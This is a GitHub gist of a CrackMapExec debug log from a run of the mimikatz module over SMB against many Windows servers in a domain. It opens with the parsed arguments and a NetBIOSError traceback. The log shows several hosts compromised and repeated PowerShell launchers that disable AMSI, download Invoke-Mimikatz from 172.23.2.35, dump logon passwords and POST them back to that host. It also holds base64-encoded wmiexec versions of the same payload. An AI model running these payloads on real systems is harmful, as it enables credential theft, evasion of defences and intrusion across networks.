Created
April 13, 2017 17:21
-
-
Save cclements/09c6db6a010acab7f6bd345e21973636 to your computer and use it in GitHub Desktop.
cme_debug
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DEBUG Passed args: | |
{'content': False, | |
'cred_id': [], | |
'darrell': False, | |
'depth': None, | |
'disks': False, | |
'domain': None, | |
'exclude_dirs': '', | |
'exec_method': None, | |
'execute': None, | |
'fail_limit': None, | |
'force_ps32': False, | |
'gen_relay_list': None, | |
'gfail_limit': None, | |
'groups': None, | |
'hash': [], | |
'jitter': None, | |
'list_modules': False, | |
'local_auth': False, | |
'local_groups': None, | |
'loggedon_users': False, | |
'lsa': False, | |
'module': 'mimikatz', | |
'module_options': [], | |
'no_output': False, | |
'ntds': None, | |
'only_files': False, | |
'pass_pol': False, | |
'password': ['pass'], | |
'pattern': None, | |
'protocol': 'smb', | |
'ps_execute': None, | |
'regex': None, | |
'rid_brute': None, | |
'sam': False, | |
'server': 'https', | |
'server_host': '0.0.0.0', | |
'server_port': None, | |
'sessions': False, | |
'share': 'C$', | |
'shares': False, | |
'show_module_options': False, | |
'smb_port': 445, | |
'spider': None, | |
'spider_folder': '.', | |
'target': ['target_list'], | |
'threads': 100, | |
'timeout': None, | |
'ufail_limit': None, | |
'username': ['user'], | |
'users': None, | |
'verbose': True, | |
'wmi': None, | |
'wmi_namespace': 'root\\cimv2'} | |
DEBUG CME server type: https | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/site-packages/gevent/greenlet.py", line 536, in run | |
result = self._run(*self.args, **self.kwargs) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/protocols/smb.py", line 107, in __init__ | |
connection.__init__(self, args, db, host) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/connection.py", line 33, in __init__ | |
self.proto_flow() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/connection.py", line 62, in proto_flow | |
self.enum_host_info() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/protocols/smb.py", line 198, in enum_host_info | |
self.conn.login('' , '') | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/smbconnection.py", line 258, in login | |
return self._SMBConnection.login(user, password, domain, lmhash, nthash, ntlmFallback) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/smb.py", line 3365, in login | |
self.login_extended(user, password, domain, lmhash, nthash, use_ntlmv2 = True) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/smb.py", line 3300, in login_extended | |
smb = self.recvSMB() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/smb.py", line 2493, in recvSMB | |
r = self._sess.recv_packet(self.__timeout) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/nmb.py", line 854, in recv_packet | |
data = self.__read(timeout) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/nmb.py", line 932, in __read | |
data = self.read_function(4, timeout) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/thirdparty/impacket/impacket/nmb.py", line 921, in non_polling_read | |
raise NetBIOSError, ('Error while reading from remote', ERRCLASS_OS, None) | |
NetBIOSError: Error while reading from remote | |
Thu Apr 13 12:03:20 2017 <Greenlet at 0x7eff6c09ec30: smb(Namespace(content=False, cred_id=[], darrell=False, <protocol.database instance at 0x7eff7078f440>, 'COHDC01.sometarget.com')> failed with NetBIOSError | |
SMB AC29.sometarget.com 445 AC29 [*] Windows Server 2012 Standard 9200 x64 (name:AC29) (domain:TEST) (signing:True) | |
SMB JUMP.sometarget.com 445 JUMP [*] Windows Server 2012 R2 Standard 9600 x64 (name:JUMP) (domain:TEST) (signing:True) | |
SMB CQAS01.sometarget.com 445 CQAS01 [*] Windows Server 2012 R2 Standard 9600 x64 (name:CQAS01) (domain:TEST) (signing:False) | |
SMB AC51.sometarget.com 445 AC51 [*] Windows Server (R) 2008 Enterprise 6002 Service Pack 2 x32 (name:AC51) (domain:TEST) (signing:False) | |
SMB ACTSMPROX.sometarget.com 445 ACTSMPROX [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:ACTSMPROX) (domain:TEST) (signing:True) | |
SMB CDC02.sometarget.com 445 CDC02 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CDC02) (domain:TEST) (signing:True) | |
SMB ACDRTSM1.sometarget.com 445 ACDRTSM1 [*] Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (name:ACDRTSM1) (domain:TEST) (signing:True) | |
SMB SRV2.sometarget.com 445 SRV2 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV2) (domain:TEST) (signing:False) | |
SMB SRV1.sometarget.com 445 SRV1 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV1) (domain:TEST) (signing:False) | |
SMB SRV7.sometarget.com 445 SRV7 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV7) (domain:TEST) (signing:False) | |
SMB SRV3.sometarget.com 445 SRV3 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV3) (domain:TEST) (signing:False) | |
SMB TLCANISTER.sometarget.com 445 TLCANISTER [*] Windows Server 2012 R2 Standard 9600 x64 (name:TLCANISTER) (domain:TEST) (signing:False) | |
SMB CDRDC01.sometarget.com 445 CDRDC01 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CDRDC01) (domain:TEST) (signing:True) | |
SMB CDC01.sometarget.com 445 CDC01 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CDC01) (domain:TEST) (signing:True) | |
SMB ACTSMAD.sometarget.com 445 ACTSMAD [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:ACTSMAD) (domain:TEST) (signing:True) | |
SMB ACTSM1.sometarget.com 445 ACTSM1 [*] Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (name:ACTSM1) (domain:TEST) (signing:True) | |
SMB CIVRTST02.sometarget.com 445 CIVRTST02 [*] Windows Server 2012 R2 Standard 9600 x64 (name:CIVRTST02) (domain:TEST) (signing:False) | |
SMB CCOGNOS01.sometarget.com 445 CCOGNOS01 [*] Windows Server 2012 R2 Standard 9600 x64 (name:CCOGNOS01) (domain:TEST) (signing:False) | |
SMB CIVRTST01.sometarget.com 445 CIVRTST01 [*] Windows Server 2012 R2 Standard 9600 x64 (name:CIVRTST01) (domain:TEST) (signing:False) | |
SMB TLPORTAL.sometarget.com 445 TLPORTAL [*] Windows Server 2012 R2 Standard 9600 x64 (name:TLPORTAL) (domain:TEST) (signing:False) | |
SMB ACCOG01.sometarget.com 445 ACCOG01 [*] Windows Server (R) 2008 Standard without Hyper-V 6002 Service Pack 2 x64 (name:ACCOG01) (domain:TEST) (signing:False) | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
SMB CDC03.sometarget.com 445 CDC03 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CDC03) (domain:TEST) (signing:True) | |
SMB JUMPDR.sometarget.com 445 JUMPDR [*] Windows Server 2012 R2 Standard 9600 x64 (name:JUMPDR) (domain:TEST) (signing:True) | |
SMB NTISCISVR3V.sometarget.com 445 NTISCISVR3V [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:NTISCISVR3V) (domain:TEST) (signing:False) | |
SMB SRV5.sometarget.com 445 SRV5 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV5) (domain:TEST) (signing:False) | |
SMB SRV4.sometarget.com 445 SRV4 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV4) (domain:TEST) (signing:False) | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB AC29.sometarget.com 445 AC29 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB JUMP.sometarget.com 445 JUMP [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
DEBUG Target system is JUMP.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\JUMP[\\PIPE\\atsvc] | |
DEBUG StringBinding: JUMP[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:JUMP.sometarget.com[49154] | |
DEBUG Target system is AC29.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\AC29[\\PIPE\\atsvc] | |
DEBUG StringBinding: AC29[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:AC29.sometarget.com[49154] | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CQAS01.sometarget.com 445 CQAS01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
SMB ACSEPM.sometarget.com 445 ACSEPM [*] Windows Server 2012 R2 Standard 9600 x64 (name:ACSEPM) (domain:TEST) (signing:True) | |
SMB CAZDC01.sometarget.com 445 CAZDC01 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CAZDC01) (domain:TEST) (signing:True) | |
SMB SRV6.sometarget.com 445 SRV6 [*] Windows Server (R) 2008 Standard 6002 Service Pack 2 x32 (name:SRV6) (domain:TEST) (signing:False) | |
DEBUG Target system is CQAS01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CQAS01[\\PIPE\\atsvc] | |
DEBUG StringBinding: CQAS01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CQAS01.sometarget.com[49154] | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB AC51.sometarget.com 445 AC51 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB ACTSMPROX.sometarget.com 445 ACTSMPROX [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv uB -;sv mJ ec;sv Za ((gv uB).value.toString()+(gv mJ).value.toString());powershell (gv Za).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Target system is ACTSMPROX.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\ACTSMPROX[\\PIPE\\atsvc] | |
DEBUG StringBinding: ACTSMPROX[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:ACTSMPROX.sometarget.com[49154] | |
DEBUG Target system is AC51.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\AC51[\\PIPE\\atsvc] | |
DEBUG StringBinding: ac51[49155] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:AC51.sometarget.com[49155] | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv EC -;sv cy ec;sv lo ((gv EC).value.toString()+(gv cy).value.toString());powershell (gv lo).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
MIMIKATZ JUMP.sometarget.com 445 JUMP [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CDC02.sometarget.com 445 CDC02 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
